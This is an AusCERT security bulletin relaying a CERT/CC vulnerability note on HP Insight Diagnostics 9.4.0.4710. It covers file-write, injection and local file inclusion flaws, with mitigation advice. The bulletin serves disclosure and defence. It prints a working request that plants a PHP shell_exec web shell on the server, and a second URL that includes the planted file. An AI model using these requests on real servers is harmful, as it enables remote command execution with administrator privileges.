Operating System:

[WIN][UNIX/Linux]

Published:

18 June 2013

Protect yourself against future threats.

//Service

Phishing Take-Down

Drawing on our strong international CERT relationships we have a high success rate in delivering phishing take-downs.

Read more
Resources > Security Bulletins > ESB-2013.0852 

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2013.0852
        HP Insight Diagnostics 9.4.0.4710 multiple vulnerabilities
                               18 June 2013

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           HP Insight Diagnostics
Publisher:         CERT/CC
Operating System:  Windows
                   UNIX variants (UNIX, Linux, OSX)
Impact/Access:     Execute Arbitrary Code/Commands -- Remote/Unauthenticated
                   Modify Arbitrary Files          -- Remote/Unauthenticated
Resolution:        Mitigation
CVE Names:         CVE-2013-3575 CVE-2013-3574 CVE-2013-3573

Original Bulletin: 
   http://www.kb.cert.org/vuls/id/324668

Comment: At the time of the publication of this bulletin, HP has not provided 
         patches to solve these vulnerabilities.
         
         To mitigate this issue, AusCERT recommends that administrators restrict
         access by only allowing connections from trusted hosts and networks.

- --------------------------BEGIN INCLUDED TEXT--------------------

Vulnerability Note VU#324668
HP Insight Diagnostics 9.4.0.4710 multiple vulnerabilities

Original Release date: 10 Jun 2013 | Last revised: 10 Jun 2013

HP Insight Diagnostics 9.4.0.4710 and possibly earlier versions contains 
multiple vulnerabilities.

Description

It has been reported that HP Insight Diagnostics 9.4.0.4710 and possibly 
earlier versions contains multiple vulnerabilities that can be exploited by a 
remote attacker to execute arbitrary PHP code thus arbitrary commands with 
administrative privileges.

CWE-74: Improper Neutralization of Special Elements in Output Used by a 
Downstream Component ('Injection') - CVE-2013-3573

CWE-73: External Control of File Name or Path - CVE-2013-3574
HP Insight Diagnostics contains two vulnerabilities which allows an attacker to 
inject arbitrary data into a file that is stored at an arbitrary location on 
the server via the "devicePath" parameter (formerly "mount" in later versions).

https://<host>:2381/hpdiags/frontend2/commands/saveCompareConfig.php?filename=
comparesurvey&target=winhardrive&device=&devicePath=C:/hp/hpsmh/data/htdocs/
hpdiags/frontend2/help/&category=all&advanced=yes&leftFile=surveybase.
xml&leftFileName=<%3f=shell_exec($_REQUEST[0])%3b%3f>&rightFile=survey.
lastwebsession.xml&rightFileName=-&changesOnly=yes&overwrite=yes

CWE-98: Improper Control of Filename for Include/Require Statement in PHP 
Program - CVE-2013-3575

HP Insight Diagnostics contains a local file inclusion vulnerability that is 
limited to ".html" inside the "<document-root>/hpdiags/frontend2/help/" 
directory.

https://<host>:2381/hpdiags/frontend2/help/pageview.php?path=comparesurvey.html

Impact

By combining these vulnerabilities, an authenticated remote attacker may be 
able to execute arbitrary commands on the server with administrator privileges.

Solution

We are currently unaware of a practical solution to this problem.

Restrict Network Access

As a general good security practice, only allow connections from trusted hosts 
and networks. Restricting access would prevent an attacker from connecting to 
the service from a blocked network location.

Vendor Information (Learn More)

Vendor			Status		Date Notified	Date Updated
Hewlett-Packard Company	Affected	05 Apr 2013	06 Jun 2013

If you are a vendor and your product is affected, let us know.

CVSS Metrics (Learn More)

Group 		Score 	Vector
Base 		7.4 	AV:A/AC:M/Au:S/C:C/I:C/A:C
Temporal 	5.7 	E:U/RL:U/RC:UC
Environmental 	5.2 	CDP:LM/TD:M/CR:ND/IR:ND/AR:ND

References

    http://cwe.mitre.org/data/definitions/73.html
    http://cwe.mitre.org/data/definitions/74.html
    http://cwe.mitre.org/data/definitions/98.html
    http://www.hp.com/servers/diags
    http://bizsupport2.austin.hp.com/bc/docs/support/SupportManual/c03652816/c03652816.pdf

Credit

Thanks to Markus Wulftange from Daimler TSS for reporting this vulnerability.

This document was written by Michael Orlando.
Other Information

    CVE IDs: CVE-2013-3573 CVE-2013-3574 CVE-2013-3575
    Date Public: 10 Jun 2013
    Date First Published: 10 Jun 2013
    Date Last Updated: 10 Jun 2013
    Document Revision: 13

Feedback

If you have feedback, comments, or additional information about this 
vulnerability, please send us email.

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        http://www.auscert.org.au/render.html?cid=1980

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBUb/V1e4yVqjM2NGpAQITDg//Tuqq38nvv0FAyC4yfYATJpVlt8FGx0bt
9/NUcWxOop0YIxbXDM9eGKYhM5fd7XgtHxLvvSXxqaqL0PUYPY1Rq0tIXt/Imosb
ijuF38wzEog5o9sZO2FaUHgLkmk6H73VCv5xAcN2PPxZSDTDHzV7cCB6nZ/Hmjzi
Y7GWaaPtB4no7sowxhwP3xy3xwDflzqa3HYL9+2CqUQ7ozkfswfcMk4fSGRP5t5R
CEprCGmK0po/+JHOSIWJaK3XUAOTbddsupZxwrOmhmFymZaC57aPaSxwdZBcA/mu
Q+LwNMmo6xfuXc7RTyLbZk5NmeNnSZRcIB9L2rag/SP1IOZvp7tJDUPhL9kUg8OP
lQKLXr5OYndlDkt27vKKcBEeXaX1NVJ1IIyFianBs8/L34THxbPtSZJxhMHRhPNt
oUIOJFGn63iJbVHd94XvhREBD5+CUg6RzfKbhPxI+rBC+hYmbAHUJFO5LmIa2/MB
AwD1DmzRzIpDEHmbk1ZkL1Iaz7hrNnM5GWeahCQLfQPXTrIW4mMKKKMy53mpJCP2
itQnJeX5/sfeLzO7NiVEnTAC0cHP6YcJB+FgCo4Am87c9VkEfDA4ZzkJih95Ur6J
rblokoJv38TO86WnrGloLzOC05LNYM8/j2YS6sFLP0nWLIxI4UGUJCevhPB7chZD
mGxdpPAGJj4=
=0Xnr
-----END PGP SIGNATURE-----